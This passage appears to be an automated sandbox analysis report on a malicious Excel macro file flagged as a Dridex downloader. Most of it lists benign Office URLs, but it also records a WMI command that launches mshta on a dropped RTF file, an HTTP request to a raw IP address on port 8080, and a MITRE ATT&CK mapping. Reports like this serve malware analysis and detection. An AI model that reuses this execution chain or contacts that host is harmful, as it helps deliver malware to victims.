      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://store.office.de/addinstemplate
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com#
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com%
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/Todo-Internal.ReadWrite
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com9
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comF
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comP
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comb
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://tasks.office.com
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://tellmeservice.osi.office.netst
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/1G
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
      Source: EXCEL.EXE, 00000000.00000002.933931227.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782557094.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807864897.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662707230.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787086454.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743519317.0000000013235000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782352963.000000001314F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://web.microsoftstream.com/video/
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://webshell.suite.office.com
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://wus2.contentsync.
      Source: EXCEL.EXE, 00000000.00000002.933931227.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782557094.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807864897.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662707230.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787086454.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743519317.0000000013235000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://wus2.pagecontentsync.
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://www.odwebp.svc.ms
      Source: global trafficHTTP traffic detected: GET /mfkrmotherfuckeru6y82sasswhorehf9e HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: lubeHost: 157.230.250.107:8080

      E-Banking Fraud:

      barindex
      Yara detected Dridex DownloaderShow sources
      Source: Yara matchFile source: C:\ProgramData\vqcMnINBAOOJC.rtf, type: DROPPED

      System Summary:

      barindex
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: 56449657.xlsmInitial sample: EXEC
      Found protected and hidden Excel 4.0 Macro sheetShow sources
      Source: 56449657.xlsmInitial sample: Sheet name: Macro1
      Contains functionality to create processes via WMIShow sources
      Source: EXCEL.EXE, 00000000.00000002.932980210.0000000011780000.00000004.00000001.sdmpBinary or memory string: C:\Users\user\Documents\C:\Windows\SysWOW64\Wbem\wmic.exewmic process call create "mshta C:\ProgramData\vqcMnINBAOOJC.rtf"C:\Windows\System32\Wbem\wmic.exeWinSta0\Default=::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=computerComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\computerNUMBER_OF_PROCESSORS=4OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 7, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=5507ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=WSHEJMDUSERDOMAIN_ROAMINGPROFILE=computerUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows|
      Found obfuscated Excel 4.0 MacroShow sources
      Source: 56449657.xlsmMacro extractor: Sheet: Macro1 high usage of CHAR() function: 21
      Source: 56449657.xlsmMacro extractor: Sheet name: Macro1
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXECode function: 0_3_0F936F700_3_0F936F70
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXECode function: 0_3_0F934F740_3_0F934F74
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXECode function: 0_3_0F8286580_3_0F828658
      Source: 56449657.xlsmReversingLabs: Detection: 13%
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\vqcMnINBAOOJC.rtf"
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\vqcMnINBAOOJC.rtf
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\vqcMnINBAOOJC.rtf"Jump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\vqcMnINBAOOJC.rtfJump to behavior
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6044:120:WilError_01
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{187B63E3-42BF-4F73-8464-706D5F27E7FF} - OProcSessId.datJump to behavior
      Source: classification engineClassification label: mal100.troj.expl.evad.winXLSM@7/8@0/1
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: 56449657.xlsmInitial sample: OLE zip file path = xl/media/image1.png
      Source: 56449657.xlsmInitial sample: OLE zip file path = docProps/custom.xml
      Source: 1E850000.0.drInitial sample: OLE zip file path = xl/media/image1.png
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

      Persistence and Installation Behavior:

      barindex
      Creates processes via WMIShow sources
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Creates and opens a fake document (probably a fake document to hide exploiting)Show sources
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: cmd line: vqcmninbaoojc.rtfJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: cmd line: vqcmninbaoojc.rtfJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exe TID: 6052Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: mshta.exe, 00000011.00000002.928321298.00000269D5577000.00000004.00000020.sdmp, mshta.exe, 00000011.00000003.857655477.00000269D5579000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWpO
      Source: EXCEL.EXE, 00000000.00000002.930031050.000000000D9B4000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWpR
      Source: EXCEL.EXE, 00000000.00000003.801049819.000000000F88C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.801017149.000000000F860000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787281711.000000000F860000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.932447949.000000000F860000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742785503.000000000F860000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787311248.000000000F88C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.932505798.000000000F88C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742840890.000000000F88C000.00000004.00000001.sdmp, mshta.exe, 00000011.00000002.929690383.00000271D990C000.00000004.00000001.sdmp, mshta.exe, 00000011.00000003.857731341.00000271D990C000.00000004.00000001.sdmp, mshta.exe, 00000011.00000003.857862913.00000271D990D000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\vqcMnINBAOOJC.rtfJump to behavior
      Source: Yara matchFile source: app.xml, type: SAMPLE
      Source: EXCEL.EXE, 00000000.00000002.928698647.0000000002F90000.00000002.00020000.sdmp, mshta.exe, 00000011.00000002.928542745.00000269D5950000.00000002.00020000.sdmpBinary or memory string: Program Manager
      Source: EXCEL.EXE, 00000000.00000002.928698647.0000000002F90000.00000002.00020000.sdmp, mshta.exe, 00000011.00000002.928542745.00000269D5950000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: EXCEL.EXE, 00000000.00000002.928698647.0000000002F90000.00000002.00020000.sdmp, mshta.exe, 00000011.00000002.928542745.00000269D5950000.00000002.00020000.sdmpBinary or memory string: Progman
      Source: EXCEL.EXE, 00000000.00000002.928698647.0000000002F90000.00000002.00020000.sdmp, mshta.exe, 00000011.00000002.928542745.00000269D5950000.00000002.00020000.sdmpBinary or memory string: Progmanlock

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management Instrumentation21Path InterceptionProcess Injection2Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScripting3Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsExploitation for Client Execution22Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection2NTDSFile and Directory Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting3LSA SecretsSystem Information Discovery4SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol1Manipulate Device CommunicationManipulate App Store Rankings or Ratings

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
